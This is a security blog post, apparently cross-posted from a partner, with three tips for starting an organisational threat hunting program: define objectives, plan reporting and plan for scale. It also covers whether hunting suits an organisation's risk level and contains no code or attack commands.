3 Tips for Starting a Threat Hunting Program
So, you want to build a threat hunting program…but where do you start?
There are lots of ways to build a threat hunting program for your own org and depending on your hunting goals, there are plenty of options for how to hunt and what tools to use.
However, it can be challenging to figure out exactly what approach is going to achieve the outcomes you want when there are fancy new tools and security buzzwords flying at you left and right – which is why we’re here to help you filter out the shiny stuff and focus on your strategy and goals.
What is threat hunting?
Threat hunting is the process of creating a hypothesis, gathering historical data, applying filtering criteria that supports the hypothesis, and investigating the leads that are generated.
Threat hunting is important because as attackers are getting more and more crafty with their tactics, and the resulting attacks are becoming more advanced and tougher to detect. Security teams need additional methods to find threats that sometimes don’t get picked up by traditional defense measures.
You can use your existing security tools for threat hunting; or consider what tools will help you meet the goals of a new threat hunting program within your own org. And don’t forget that combining tools you already have with other information – like open-source intelligence – is an option, too.
Is hunting right for your org?
Threat hunting provides your org with an extra layer of security, but it’s also resource intensive. Before building your own threat hunting program consider your risks and resources.
For example, if you operate in a high-risk (and highly targeted) environment – such as a financial institution, healthcare facility or company that stores large amounts of personal and financial info – then hunting probably makes sense to defend against all of the adversaries who are targeting your network. However, if your org’s risk profile is medium- to low-risk, you’re likely the target of commodity malware and should evaluate where your resources are most needed. Hunting can distract security teams from tasks that should probably be higher on the priority list, such as effective anti-phishing controls, asset management and third-party assessments.
3 tips for building your own threat hunting program
Before asking your CISO for more resources, there are a couple important considerations you need to review. Think through your objectives, how you’ll report on what you find and how you’ll eventually scale your hunting program.
Here are our three must-dos before you start your own threat hunting program:
- Know your threat hunting objectives.
- Validation: Your objective is to validate existing security controls. This means your hunting hypothesis is focused on an attacker bypassing one more security control.
- Quality: You’re using hunting to perform QA on your alert management and triage. You probably want to have someone reviewing the hunt results who did not spend a ton of time in the past month reviewing alerts. You’ll want to run techniques where the hypothesis is looking for activity where you would have expected alerts to be generated. A good example here is suspicious powershell usage.
- Identify: Find threats or notable events in your environment. If you are hunting, the goal doesn’t always have to be to identify threats. Notable events are events hunting identified that were previously unknown. They maybe policy violations like discovering unauthorized software, or they could be activities that software or employees performed that the customer didn’t know about
- Evolve: Evolve your hunting and detection libraries. If you have hunting techniques in place, a long-term goal is to figure out ways to make them high enough fidelity without losing their value so that they can become detections. Similarly, if you have detections that are too false-positive prone, think about how you can build a hypothesis around them and turn them into hunting techniques.
- Decide how and what you’ll report on, and who you’re going to tell.
After defining your objectives, think about how you’ll report on the findings from a hunt, and who you’re going to brief on that info. For example, what attacker technique are you hunting for, and why? What data did you review, and what did you discover? Then talk about the outcome of your hunt, including what steps you should take — if any — to make your org more resilient going forward.
- Consider how you’ll scale the program.
Conducting a first successful hunt is great, but how will you make threat hunting part of your ongoing security practices going forward? Can you maintain an effective threat hunting program with the resources you have today, or do you need new tools or more people? Think about what scale looks like, and be prepared to have a conversation about it with your CISO or team lead.
Ready to get started? Here are a couple more good tips and how-tos for threat hunting.
The post Partner Perspectives: 3 Tips for Starting a Threat Hunting Program appeared first on Carbon Black. Peter Silberman is the Director of Detection & Response, Innovation at Expel. Mary Singh is a Detection and Response Lead at Expel.